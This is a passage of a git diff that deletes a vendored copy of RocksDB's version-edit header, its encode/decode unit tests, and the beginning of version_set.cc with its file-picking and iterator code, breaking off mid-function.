-  void SetColumnFamily(uint32_t column_family_id) {
-    column_family_ = column_family_id;
-  }
-
-  // set column family ID by calling SetColumnFamily()
-  void AddColumnFamily(const std::string& name) {
-    assert(!is_column_family_drop_);
-    assert(!is_column_family_add_);
-    assert(NumEntries() == 0);
-    is_column_family_add_ = true;
-    column_family_name_ = name;
-  }
-
-  // set column family ID by calling SetColumnFamily()
-  void DropColumnFamily() {
-    assert(!is_column_family_drop_);
-    assert(!is_column_family_add_);
-    assert(NumEntries() == 0);
-    is_column_family_drop_ = true;
-  }
-
-  // return true on success.
-  bool EncodeTo(std::string* dst) const;
-  Status DecodeFrom(const Slice& src);
-
-  const char* DecodeNewFile4From(Slice* input);
-
-  typedef std::set<std::pair<int, uint64_t>> DeletedFileSet;
-
-  const DeletedFileSet& GetDeletedFiles() { return deleted_files_; }
-  const std::vector<std::pair<int, FileMetaData>>& GetNewFiles() {
-    return new_files_;
-  }
-
-  std::string DebugString(bool hex_key = false) const;
-  std::string DebugJSON(int edit_num, bool hex_key = false) const;
-
- private:
-  friend class VersionSet;
-  friend class Version;
-
-  bool GetLevel(Slice* input, int* level, const char** msg);
-
-  int max_level_;
-  std::string comparator_;
-  uint64_t log_number_;
-  uint64_t prev_log_number_;
-  uint64_t next_file_number_;
-  uint32_t max_column_family_;
-  SequenceNumber last_sequence_;
-  bool has_comparator_;
-  bool has_log_number_;
-  bool has_prev_log_number_;
-  bool has_next_file_number_;
-  bool has_last_sequence_;
-  bool has_max_column_family_;
-
-  DeletedFileSet deleted_files_;
-  std::vector<std::pair<int, FileMetaData>> new_files_;
-
-  // Each version edit record should have column_family_id set
-  // If it's not set, it is default (0)
-  uint32_t column_family_;
-  // a version edit can be either column_family add or
-  // column_family drop. If it's column family add,
-  // it also includes column family name.
-  bool is_column_family_drop_;
-  bool is_column_family_add_;
-  std::string column_family_name_;
-};
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/version_edit_test.cc b/thirdparty/rocksdb/db/version_edit_test.cc
deleted file mode 100644
index 338bb36..0000000
--- a/thirdparty/rocksdb/db/version_edit_test.cc
+++ /dev/null
@@ -1,189 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/version_edit.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-
-static void TestEncodeDecode(const VersionEdit& edit) {
-  std::string encoded, encoded2;
-  edit.EncodeTo(&encoded);
-  VersionEdit parsed;
-  Status s = parsed.DecodeFrom(encoded);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  parsed.EncodeTo(&encoded2);
-  ASSERT_EQ(encoded, encoded2);
-}
-
-class VersionEditTest : public testing::Test {};
-
-TEST_F(VersionEditTest, EncodeDecode) {
-  static const uint64_t kBig = 1ull << 50;
-  static const uint32_t kBig32Bit = 1ull << 30;
-
-  VersionEdit edit;
-  for (int i = 0; i < 4; i++) {
-    TestEncodeDecode(edit);
-    edit.AddFile(3, kBig + 300 + i, kBig32Bit + 400 + i, 0,
-                 InternalKey("foo", kBig + 500 + i, kTypeValue),
-                 InternalKey("zoo", kBig + 600 + i, kTypeDeletion),
-                 kBig + 500 + i, kBig + 600 + i, false);
-    edit.DeleteFile(4, kBig + 700 + i);
-  }
-
-  edit.SetComparatorName("foo");
-  edit.SetLogNumber(kBig + 100);
-  edit.SetNextFile(kBig + 200);
-  edit.SetLastSequence(kBig + 1000);
-  TestEncodeDecode(edit);
-}
-
-TEST_F(VersionEditTest, EncodeDecodeNewFile4) {
-  static const uint64_t kBig = 1ull << 50;
-
-  VersionEdit edit;
-  edit.AddFile(3, 300, 3, 100, InternalKey("foo", kBig + 500, kTypeValue),
-               InternalKey("zoo", kBig + 600, kTypeDeletion), kBig + 500,
-               kBig + 600, true);
-  edit.AddFile(4, 301, 3, 100, InternalKey("foo", kBig + 501, kTypeValue),
-               InternalKey("zoo", kBig + 601, kTypeDeletion), kBig + 501,
-               kBig + 601, false);
-  edit.AddFile(5, 302, 0, 100, InternalKey("foo", kBig + 502, kTypeValue),
-               InternalKey("zoo", kBig + 602, kTypeDeletion), kBig + 502,
-               kBig + 602, true);
-
-  edit.DeleteFile(4, 700);
-
-  edit.SetComparatorName("foo");
-  edit.SetLogNumber(kBig + 100);
-  edit.SetNextFile(kBig + 200);
-  edit.SetLastSequence(kBig + 1000);
-  TestEncodeDecode(edit);
-
-  std::string encoded, encoded2;
-  edit.EncodeTo(&encoded);
-  VersionEdit parsed;
-  Status s = parsed.DecodeFrom(encoded);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  auto& new_files = parsed.GetNewFiles();
-  ASSERT_TRUE(new_files[0].second.marked_for_compaction);
-  ASSERT_TRUE(!new_files[1].second.marked_for_compaction);
-  ASSERT_TRUE(new_files[2].second.marked_for_compaction);
-  ASSERT_EQ(3, new_files[0].second.fd.GetPathId());
-  ASSERT_EQ(3, new_files[1].second.fd.GetPathId());
-  ASSERT_EQ(0, new_files[2].second.fd.GetPathId());
-}
-
-TEST_F(VersionEditTest, ForwardCompatibleNewFile4) {
-  static const uint64_t kBig = 1ull << 50;
-  VersionEdit edit;
-  edit.AddFile(3, 300, 3, 100, InternalKey("foo", kBig + 500, kTypeValue),
-               InternalKey("zoo", kBig + 600, kTypeDeletion), kBig + 500,
-               kBig + 600, true);
-  edit.AddFile(4, 301, 3, 100, InternalKey("foo", kBig + 501, kTypeValue),
-               InternalKey("zoo", kBig + 601, kTypeDeletion), kBig + 501,
-               kBig + 601, false);
-  edit.DeleteFile(4, 700);
-
-  edit.SetComparatorName("foo");
-  edit.SetLogNumber(kBig + 100);
-  edit.SetNextFile(kBig + 200);
-  edit.SetLastSequence(kBig + 1000);
-
-  std::string encoded;
-
-  // Call back function to add extra customized builds.
-  bool first = true;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "VersionEdit::EncodeTo:NewFile4:CustomizeFields", [&](void* arg) {
-        std::string* str = reinterpret_cast<std::string*>(arg);
-        PutVarint32(str, 33);
-        const std::string str1 = "random_string";
-        PutLengthPrefixedSlice(str, str1);
-        if (first) {
-          first = false;
-          PutVarint32(str, 22);
-          const std::string str2 = "s";
-          PutLengthPrefixedSlice(str, str2);
-        }
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  edit.EncodeTo(&encoded);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  VersionEdit parsed;
-  Status s = parsed.DecodeFrom(encoded);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_TRUE(!first);
-  auto& new_files = parsed.GetNewFiles();
-  ASSERT_TRUE(new_files[0].second.marked_for_compaction);
-  ASSERT_TRUE(!new_files[1].second.marked_for_compaction);
-  ASSERT_EQ(3, new_files[0].second.fd.GetPathId());
-  ASSERT_EQ(3, new_files[1].second.fd.GetPathId());
-  ASSERT_EQ(1u, parsed.GetDeletedFiles().size());
-}
-
-TEST_F(VersionEditTest, NewFile4NotSupportedField) {
-  static const uint64_t kBig = 1ull << 50;
-  VersionEdit edit;
-  edit.AddFile(3, 300, 3, 100, InternalKey("foo", kBig + 500, kTypeValue),
-               InternalKey("zoo", kBig + 600, kTypeDeletion), kBig + 500,
-               kBig + 600, true);
-
-  edit.SetComparatorName("foo");
-  edit.SetLogNumber(kBig + 100);
-  edit.SetNextFile(kBig + 200);
-  edit.SetLastSequence(kBig + 1000);
-
-  std::string encoded;
-
-  // Call back function to add extra customized builds.
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "VersionEdit::EncodeTo:NewFile4:CustomizeFields", [&](void* arg) {
-        std::string* str = reinterpret_cast<std::string*>(arg);
-        const std::string str1 = "s";
-        PutLengthPrefixedSlice(str, str1);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  edit.EncodeTo(&encoded);
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  VersionEdit parsed;
-  Status s = parsed.DecodeFrom(encoded);
-  ASSERT_NOK(s);
-}
-
-TEST_F(VersionEditTest, EncodeEmptyFile) {
-  VersionEdit edit;
-  edit.AddFile(0, 0, 0, 0, InternalKey(), InternalKey(), 0, 0, false);
-  std::string buffer;
-  ASSERT_TRUE(!edit.EncodeTo(&buffer));
-}
-
-TEST_F(VersionEditTest, ColumnFamilyTest) {
-  VersionEdit edit;
-  edit.SetColumnFamily(2);
-  edit.AddColumnFamily("column_family");
-  edit.SetMaxColumnFamily(5);
-  TestEncodeDecode(edit);
-
-  edit.Clear();
-  edit.SetColumnFamily(3);
-  edit.DropColumnFamily();
-  TestEncodeDecode(edit);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/version_set.cc b/thirdparty/rocksdb/db/version_set.cc
deleted file mode 100644
index 782ebc2..0000000
--- a/thirdparty/rocksdb/db/version_set.cc
+++ /dev/null
@@ -1,3814 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/version_set.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <stdio.h>
-#include <algorithm>
-#include <climits>
-#include <map>
-#include <set>
-#include <string>
-#include <unordered_map>
-#include <vector>
-#include "db/compaction.h"
-#include "db/internal_stats.h"
-#include "db/log_reader.h"
-#include "db/log_writer.h"
-#include "db/memtable.h"
-#include "db/merge_context.h"
-#include "db/merge_helper.h"
-#include "db/pinned_iterators_manager.h"
-#include "db/table_cache.h"
-#include "db/version_builder.h"
-#include "monitoring/file_read_sample.h"
-#include "monitoring/perf_context_imp.h"
-#include "rocksdb/env.h"
-#include "rocksdb/merge_operator.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/format.h"
-#include "table/get_context.h"
-#include "table/internal_iterator.h"
-#include "table/merging_iterator.h"
-#include "table/meta_blocks.h"
-#include "table/plain_table_factory.h"
-#include "table/table_reader.h"
-#include "table/two_level_iterator.h"
-#include "util/coding.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-namespace {
-
-// Find File in LevelFilesBrief data structure
-// Within an index range defined by left and right
-int FindFileInRange(const InternalKeyComparator& icmp,
-    const LevelFilesBrief& file_level,
-    const Slice& key,
-    uint32_t left,
-    uint32_t right) {
-  while (left < right) {
-    uint32_t mid = (left + right) / 2;
-    const FdWithKeyRange& f = file_level.files[mid];
-    if (icmp.InternalKeyComparator::Compare(f.largest_key, key) < 0) {
-      // Key at "mid.largest" is < "target".  Therefore all
-      // files at or before "mid" are uninteresting.
-      left = mid + 1;
-    } else {
-      // Key at "mid.largest" is >= "target".  Therefore all files
-      // after "mid" are uninteresting.
-      right = mid;
-    }
-  }
-  return right;
-}
-
-// Class to help choose the next file to search for the particular key.
-// Searches and returns files level by level.
-// We can search level-by-level since entries never hop across
-// levels. Therefore we are guaranteed that if we find data
-// in a smaller level, later levels are irrelevant (unless we
-// are MergeInProgress).
-class FilePicker {
- public:
-  FilePicker(std::vector<FileMetaData*>* files, const Slice& user_key,
-             const Slice& ikey, autovector<LevelFilesBrief>* file_levels,
-             unsigned int num_levels, FileIndexer* file_indexer,
-             const Comparator* user_comparator,
-             const InternalKeyComparator* internal_comparator)
-      : num_levels_(num_levels),
-        curr_level_(static_cast<unsigned int>(-1)),
-        returned_file_level_(static_cast<unsigned int>(-1)),
-        hit_file_level_(static_cast<unsigned int>(-1)),
-        search_left_bound_(0),
-        search_right_bound_(FileIndexer::kLevelMaxIndex),
-#ifndef NDEBUG
-        files_(files),
-#endif
-        level_files_brief_(file_levels),
-        is_hit_file_last_in_level_(false),
-        user_key_(user_key),
-        ikey_(ikey),
-        file_indexer_(file_indexer),
-        user_comparator_(user_comparator),
-        internal_comparator_(internal_comparator) {
-    // Setup member variables to search first level.
-    search_ended_ = !PrepareNextLevel();
-    if (!search_ended_) {
-      // Prefetch Level 0 table data to avoid cache miss if possible.
-      for (unsigned int i = 0; i < (*level_files_brief_)[0].num_files; ++i) {
-        auto* r = (*level_files_brief_)[0].files[i].fd.table_reader;
-        if (r) {
-          r->Prepare(ikey);
-        }
-      }
-    }
-  }
-
-  int GetCurrentLevel() const { return curr_level_; }
-
-  FdWithKeyRange* GetNextFile() {
-    while (!search_ended_) {  // Loops over different levels.
-      while (curr_index_in_curr_level_ < curr_file_level_->num_files) {
-        // Loops over all files in current level.
-        FdWithKeyRange* f = &curr_file_level_->files[curr_index_in_curr_level_];
-        hit_file_level_ = curr_level_;
-        is_hit_file_last_in_level_ =
-            curr_index_in_curr_level_ == curr_file_level_->num_files - 1;
-        int cmp_largest = -1;
-
-        // Do key range filtering of files or/and fractional cascading if:
-        // (1) not all the files are in level 0, or
-        // (2) there are more than 3 current level files
-        // If there are only 3 or less current level files in the system, we skip
-        // the key range filtering. In this case, more likely, the system is
-        // highly tuned to minimize number of tables queried by each query,
-        // so it is unlikely that key range filtering is more efficient than
-        // querying the files.
-        if (num_levels_ > 1 || curr_file_level_->num_files > 3) {
-          // Check if key is within a file's range. If search left bound and
-          // right bound point to the same find, we are sure key falls in
-          // range.
-          assert(
-              curr_level_ == 0 ||
-              curr_index_in_curr_level_ == start_index_in_curr_level_ ||
-              user_comparator_->Compare(user_key_,
-                ExtractUserKey(f->smallest_key)) <= 0);
-
-          int cmp_smallest = user_comparator_->Compare(user_key_,
-              ExtractUserKey(f->smallest_key));
-          if (cmp_smallest >= 0) {
-            cmp_largest = user_comparator_->Compare(user_key_,
-                ExtractUserKey(f->largest_key));
-          }
-
-          // Setup file search bound for the next level based on the
-          // comparison results
-          if (curr_level_ > 0) {
-            file_indexer_->GetNextLevelIndex(curr_level_,
-                                            curr_index_in_curr_level_,
-                                            cmp_smallest, cmp_largest,
-                                            &search_left_bound_,
-                                            &search_right_bound_);
-          }
-          // Key falls out of current file's range
-          if (cmp_smallest < 0 || cmp_largest > 0) {
-            if (curr_level_ == 0) {
-              ++curr_index_in_curr_level_;
-              continue;
-            } else {
-              // Search next level.
-              break;
-            }
-          }
-        }
-#ifndef NDEBUG
-        // Sanity check to make sure that the files are correctly sorted
-        if (prev_file_) {
-          if (curr_level_ != 0) {
-            int comp_sign = internal_comparator_->Compare(
-                prev_file_->largest_key, f->smallest_key);
-            assert(comp_sign < 0);
-          } else {
-            // level == 0, the current file cannot be newer than the previous
-            // one. Use compressed data structure, has no attribute seqNo
-            assert(curr_index_in_curr_level_ > 0);
-            assert(!NewestFirstBySeqNo(files_[0][curr_index_in_curr_level_],
-                  files_[0][curr_index_in_curr_level_-1]));
-          }
-        }
-        prev_file_ = f;
-#endif
-        returned_file_level_ = curr_level_;
-        if (curr_level_ > 0 && cmp_largest < 0) {
-          // No more files to search in this level.
-          search_ended_ = !PrepareNextLevel();
-        } else {
-          ++curr_index_in_curr_level_;
-        }
-        return f;
-      }
-      // Start searching next level.
-      search_ended_ = !PrepareNextLevel();
-    }
-    // Search ended.
-    return nullptr;
-  }
-
-  // getter for current file level
-  // for GET_HIT_L0, GET_HIT_L1 & GET_HIT_L2_AND_UP counts
-  unsigned int GetHitFileLevel() { return hit_file_level_; }
-
-  // Returns true if the most recent "hit file" (i.e., one returned by
-  // GetNextFile()) is at the last index in its level.
-  bool IsHitFileLastInLevel() { return is_hit_file_last_in_level_; }
-
- private:
-  unsigned int num_levels_;
-  unsigned int curr_level_;
-  unsigned int returned_file_level_;
-  unsigned int hit_file_level_;
-  int32_t search_left_bound_;
-  int32_t search_right_bound_;
-#ifndef NDEBUG
-  std::vector<FileMetaData*>* files_;
-#endif
-  autovector<LevelFilesBrief>* level_files_brief_;
-  bool search_ended_;
-  bool is_hit_file_last_in_level_;
-  LevelFilesBrief* curr_file_level_;
-  unsigned int curr_index_in_curr_level_;
-  unsigned int start_index_in_curr_level_;
-  Slice user_key_;
-  Slice ikey_;
-  FileIndexer* file_indexer_;
-  const Comparator* user_comparator_;
-  const InternalKeyComparator* internal_comparator_;
-#ifndef NDEBUG
-  FdWithKeyRange* prev_file_;
-#endif
-
-  // Setup local variables to search next level.
-  // Returns false if there are no more levels to search.
-  bool PrepareNextLevel() {
-    curr_level_++;
-    while (curr_level_ < num_levels_) {
-      curr_file_level_ = &(*level_files_brief_)[curr_level_];
-      if (curr_file_level_->num_files == 0) {
-        // When current level is empty, the search bound generated from upper
-        // level must be [0, -1] or [0, FileIndexer::kLevelMaxIndex] if it is
-        // also empty.
-        assert(search_left_bound_ == 0);
-        assert(search_right_bound_ == -1 ||
-               search_right_bound_ == FileIndexer::kLevelMaxIndex);
-        // Since current level is empty, it will need to search all files in
-        // the next level
-        search_left_bound_ = 0;
-        search_right_bound_ = FileIndexer::kLevelMaxIndex;
-        curr_level_++;
-        continue;
-      }
-
-      // Some files may overlap each other. We find
-      // all files that overlap user_key and process them in order from
-      // newest to oldest. In the context of merge-operator, this can occur at
-      // any level. Otherwise, it only occurs at Level-0 (since Put/Deletes
-      // are always compacted into a single entry).
-      int32_t start_index;
-      if (curr_level_ == 0) {
-        // On Level-0, we read through all files to check for overlap.
-        start_index = 0;
-      } else {
-        // On Level-n (n>=1), files are sorted. Binary search to find the
-        // earliest file whose largest key >= ikey. Search left bound and
-        // right bound are used to narrow the range.
-        if (search_left_bound_ == search_right_bound_) {
-          start_index = search_left_bound_;
-        } else if (search_left_bound_ < search_right_bound_) {
-          if (search_right_bound_ == FileIndexer::kLevelMaxIndex) {
-            search_right_bound_ =
-                static_cast<int32_t>(curr_file_level_->num_files) - 1;
-          }
-          start_index =
-              FindFileInRange(*internal_comparator_, *curr_file_level_, ikey_,
-                              static_cast<uint32_t>(search_left_bound_),
-                              static_cast<uint32_t>(search_right_bound_));
-        } else {
-          // search_left_bound > search_right_bound, key does not exist in
-          // this level. Since no comparison is done in this level, it will
-          // need to search all files in the next level.
-          search_left_bound_ = 0;
-          search_right_bound_ = FileIndexer::kLevelMaxIndex;
-          curr_level_++;
-          continue;
-        }
-      }
-      start_index_in_curr_level_ = start_index;
-      curr_index_in_curr_level_ = start_index;
-#ifndef NDEBUG
-      prev_file_ = nullptr;
-#endif
-      return true;
-    }
-    // curr_level_ = num_levels_. So, no more levels to search.
-    return false;
-  }
-};
-}  // anonymous namespace
-
-VersionStorageInfo::~VersionStorageInfo() { delete[] files_; }
-
-Version::~Version() {
-  assert(refs_ == 0);
-
-  // Remove from linked list
-  prev_->next_ = next_;
-  next_->prev_ = prev_;
-
-  // Drop references to files
-  for (int level = 0; level < storage_info_.num_levels_; level++) {
-    for (size_t i = 0; i < storage_info_.files_[level].size(); i++) {
-      FileMetaData* f = storage_info_.files_[level][i];
-      assert(f->refs > 0);
-      f->refs--;
-      if (f->refs <= 0) {
-        vset_->obsolete_files_.push_back(f);
-      }
-    }
-  }
-}
-
-int FindFile(const InternalKeyComparator& icmp,
-             const LevelFilesBrief& file_level,
-             const Slice& key) {
-  return FindFileInRange(icmp, file_level, key, 0,
-                         static_cast<uint32_t>(file_level.num_files));
-}
-
-void DoGenerateLevelFilesBrief(LevelFilesBrief* file_level,
-        const std::vector<FileMetaData*>& files,
-        Arena* arena) {
-  assert(file_level);
-  assert(arena);
-
-  size_t num = files.size();
-  file_level->num_files = num;
-  char* mem = arena->AllocateAligned(num * sizeof(FdWithKeyRange));
-  file_level->files = new (mem)FdWithKeyRange[num];
-
-  for (size_t i = 0; i < num; i++) {
-    Slice smallest_key = files[i]->smallest.Encode();
-    Slice largest_key = files[i]->largest.Encode();
-
-    // Copy key slice to sequential memory
-    size_t smallest_size = smallest_key.size();
-    size_t largest_size = largest_key.size();
-    mem = arena->AllocateAligned(smallest_size + largest_size);
-    memcpy(mem, smallest_key.data(), smallest_size);
-    memcpy(mem + smallest_size, largest_key.data(), largest_size);
-
-    FdWithKeyRange& f = file_level->files[i];
-    f.fd = files[i]->fd;
-    f.file_metadata = files[i];
-    f.smallest_key = Slice(mem, smallest_size);
-    f.largest_key = Slice(mem + smallest_size, largest_size);
-  }
-}
-
-static bool AfterFile(const Comparator* ucmp,
-                      const Slice* user_key, const FdWithKeyRange* f) {
-  // nullptr user_key occurs before all keys and is therefore never after *f
-  return (user_key != nullptr &&
-          ucmp->Compare(*user_key, ExtractUserKey(f->largest_key)) > 0);
-}
-
-static bool BeforeFile(const Comparator* ucmp,
-                       const Slice* user_key, const FdWithKeyRange* f) {
-  // nullptr user_key occurs after all keys and is therefore never before *f
-  return (user_key != nullptr &&
-          ucmp->Compare(*user_key, ExtractUserKey(f->smallest_key)) < 0);
-}
-
-bool SomeFileOverlapsRange(
-    const InternalKeyComparator& icmp,
-    bool disjoint_sorted_files,
-    const LevelFilesBrief& file_level,
-    const Slice* smallest_user_key,
-    const Slice* largest_user_key) {
-  const Comparator* ucmp = icmp.user_comparator();
-  if (!disjoint_sorted_files) {
-    // Need to check against all files
-    for (size_t i = 0; i < file_level.num_files; i++) {
-      const FdWithKeyRange* f = &(file_level.files[i]);
-      if (AfterFile(ucmp, smallest_user_key, f) ||
-          BeforeFile(ucmp, largest_user_key, f)) {
-        // No overlap
-      } else {
-        return true;  // Overlap
-      }
-    }
-    return false;
-  }
-
-  // Binary search over file list
-  uint32_t index = 0;
-  if (smallest_user_key != nullptr) {
-    // Find the earliest possible internal key for smallest_user_key
-    InternalKey small;
-    small.SetMaxPossibleForUserKey(*smallest_user_key);
-    index = FindFile(icmp, file_level, small.Encode());
-  }
-
-  if (index >= file_level.num_files) {
-    // beginning of range is after all files, so no overlap.
-    return false;
-  }
-
-  return !BeforeFile(ucmp, largest_user_key, &file_level.files[index]);
-}
-
-namespace {
-
-// An internal iterator.  For a given version/level pair, yields
-// information about the files in the level.  For a given entry, key()
-// is the largest key that occurs in the file, and value() is an
-// 16-byte value containing the file number and file size, both
-// encoded using EncodeFixed64.
-class LevelFileNumIterator : public InternalIterator {
- public:
-  LevelFileNumIterator(const InternalKeyComparator& icmp,
-                       const LevelFilesBrief* flevel, bool should_sample)
-      : icmp_(icmp),
-        flevel_(flevel),
-        index_(static_cast<uint32_t>(flevel->num_files)),
-        current_value_(0, 0, 0),  // Marks as invalid
-        should_sample_(should_sample) {}
-  virtual bool Valid() const override { return index_ < flevel_->num_files; }
-  virtual void Seek(const Slice& target) override {
-    index_ = FindFile(icmp_, *flevel_, target);
-  }
-  virtual void SeekForPrev(const Slice& target) override {
-    SeekForPrevImpl(target, &icmp_);
-  }
-
-  virtual void SeekToFirst() override { index_ = 0; }
-  virtual void SeekToLast() override {
-    index_ = (flevel_->num_files == 0)
-                 ? 0
-                 : static_cast<uint32_t>(flevel_->num_files) - 1;
-  }
-  virtual void Next() override {
-    assert(Valid());
-    index_++;
-  }
-  virtual void Prev() override {
-    assert(Valid());
-    if (index_ == 0) {
-      index_ = static_cast<uint32_t>(flevel_->num_files);  // Marks as invalid
-    } else {
-      index_--;
-    }
-  }
-  Slice key() const override {
-    assert(Valid());
-    return flevel_->files[index_].largest_key;
-  }
-  Slice value() const override {
-    assert(Valid());
-
-    auto file_meta = flevel_->files[index_];
-    if (should_sample_) {
-      sample_file_read_inc(file_meta.file_metadata);
-    }
-    current_value_ = file_meta.fd;
-    return Slice(reinterpret_cast<const char*>(&current_value_),
-                 sizeof(FileDescriptor));
-  }
-  virtual Status status() const override { return Status::OK(); }
-
- private:
-  const InternalKeyComparator icmp_;
-  const LevelFilesBrief* flevel_;
-  uint32_t index_;
-  mutable FileDescriptor current_value_;
-  bool should_sample_;
-};
-
-class LevelFileIteratorState : public TwoLevelIteratorState {
- public:
-  // @param skip_filters Disables loading/accessing the filter block
-  LevelFileIteratorState(TableCache* table_cache,
-                         const ReadOptions& read_options,
-                         const EnvOptions& env_options,
-                         const InternalKeyComparator& icomparator,
-                         HistogramImpl* file_read_hist, bool for_compaction,
-                         bool prefix_enabled, bool skip_filters, int level,
-                         RangeDelAggregator* range_del_agg)
-      : TwoLevelIteratorState(prefix_enabled),
-        table_cache_(table_cache),
-        read_options_(read_options),
-        env_options_(env_options),
-        icomparator_(icomparator),
-        file_read_hist_(file_read_hist),
-        for_compaction_(for_compaction),
-        skip_filters_(skip_filters),
-        level_(level),
-        range_del_agg_(range_del_agg) {}
-
-  InternalIterator* NewSecondaryIterator(const Slice& meta_handle) override {
-    if (meta_handle.size() != sizeof(FileDescriptor)) {
-      return NewErrorInternalIterator(
-          Status::Corruption("FileReader invoked with unexpected value"));
-    }
-    const FileDescriptor* fd =
-        reinterpret_cast<const FileDescriptor*>(meta_handle.data());
-    return table_cache_->NewIterator(
-        read_options_, env_options_, icomparator_, *fd, range_del_agg_,
-        nullptr /* don't need reference to table */, file_read_hist_,
-        for_compaction_, nullptr /* arena */, skip_filters_, level_);
-  }
-
-  bool PrefixMayMatch(const Slice& internal_key) override {
-    return true;
-  }
-
-  bool KeyReachedUpperBound(const Slice& internal_key) override {
-    return read_options_.iterate_upper_bound != nullptr &&
-           icomparator_.user_comparator()->Compare(
-               ExtractUserKey(internal_key),
-               *read_options_.iterate_upper_bound) >= 0;
-  }
-
- private:
-  TableCache* table_cache_;
-  const ReadOptions read_options_;
-  const EnvOptions& env_options_;
-  const InternalKeyComparator& icomparator_;
-  HistogramImpl* file_read_hist_;
-  bool for_compaction_;
-  bool skip_filters_;
-  int level_;
-  RangeDelAggregator* range_del_agg_;
-};
-
-// A wrapper of version builder which references the current version in
-// constructor and unref it in the destructor.
-// Both of the constructor and destructor need to be called inside DB Mutex.
-class BaseReferencedVersionBuilder {
- public:
-  explicit BaseReferencedVersionBuilder(ColumnFamilyData* cfd)
-      : version_builder_(new VersionBuilder(
-            cfd->current()->version_set()->env_options(), cfd->table_cache(),
-            cfd->current()->storage_info(), cfd->ioptions()->info_log)),
-        version_(cfd->current()) {
-    version_->Ref();
-  }
-  ~BaseReferencedVersionBuilder() {
-    delete version_builder_;
-    version_->Unref();
-  }
-  VersionBuilder* version_builder() { return version_builder_; }
-
- private:
-  VersionBuilder* version_builder_;
-  Version* version_;
-};
-}  // anonymous namespace
-
-Status Version::GetTableProperties(std::shared_ptr<const TableProperties>* tp,
-                                   const FileMetaData* file_meta,
-                                   const std::string* fname) const {
-  auto table_cache = cfd_->table_cache();
-  auto ioptions = cfd_->ioptions();
-  Status s = table_cache->GetTableProperties(
-      vset_->env_options_, cfd_->internal_comparator(), file_meta->fd,
-      tp, true /* no io */);
-  if (s.ok()) {
-    return s;
-  }
-
-  // We only ignore error type `Incomplete` since it's by design that we
-  // disallow table when it's not in table cache.
-  if (!s.IsIncomplete()) {
-    return s;
-  }
-
-  // 2. Table is not present in table cache, we'll read the table properties
-  // directly from the properties block in the file.
-  std::unique_ptr<RandomAccessFile> file;
-  std::string file_name;
-  if (fname != nullptr) {
-    file_name = *fname;
-  } else {
-    file_name =
-      TableFileName(vset_->db_options_->db_paths, file_meta->fd.GetNumber(),
-                    file_meta->fd.GetPathId());
-  }
-  s = ioptions->env->NewRandomAccessFile(file_name, &file, vset_->env_options_);
-  if (!s.ok()) {
-    return s;
-  }
-
-  TableProperties* raw_table_properties;
-  // By setting the magic number to kInvalidTableMagicNumber, we can by
-  // pass the magic number check in the footer.
-  std::unique_ptr<RandomAccessFileReader> file_reader(
-      new RandomAccessFileReader(std::move(file), file_name));
-  s = ReadTableProperties(
-      file_reader.get(), file_meta->fd.GetFileSize(),
-      Footer::kInvalidTableMagicNumber /* table's magic number */, *ioptions, &raw_table_properties);
-  if (!s.ok()) {
-    return s;
-  }
-  RecordTick(ioptions->statistics, NUMBER_DIRECT_LOAD_TABLE_PROPERTIES);
-
-  *tp = std::shared_ptr<const TableProperties>(raw_table_properties);
-  return s;
-}
-
-Status Version::GetPropertiesOfAllTables(TablePropertiesCollection* props) {
-  Status s;
-  for (int level = 0; level < storage_info_.num_levels_; level++) {
-    s = GetPropertiesOfAllTables(props, level);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-
-  return Status::OK();
-}
-
-Status Version::GetPropertiesOfAllTables(TablePropertiesCollection* props,
-                                         int level) {
-  for (const auto& file_meta : storage_info_.files_[level]) {
-    auto fname =
-        TableFileName(vset_->db_options_->db_paths, file_meta->fd.GetNumber(),
-                      file_meta->fd.GetPathId());
-    // 1. If the table is already present in table cache, load table
-    // properties from there.
-    std::shared_ptr<const TableProperties> table_properties;
-    Status s = GetTableProperties(&table_properties, file_meta, &fname);
-    if (s.ok()) {
-      props->insert({fname, table_properties});
-    } else {
-      return s;
-    }
-  }
-
-  return Status::OK();
-}
-
-Status Version::GetPropertiesOfTablesInRange(
-    const Range* range, std::size_t n, TablePropertiesCollection* props) const {
-  for (int level = 0; level < storage_info_.num_non_empty_levels(); level++) {
-    for (decltype(n) i = 0; i < n; i++) {
-      // Convert user_key into a corresponding internal key.
-      InternalKey k1(range[i].start, kMaxSequenceNumber, kValueTypeForSeek);
-      InternalKey k2(range[i].limit, kMaxSequenceNumber, kValueTypeForSeek);
-      std::vector<FileMetaData*> files;
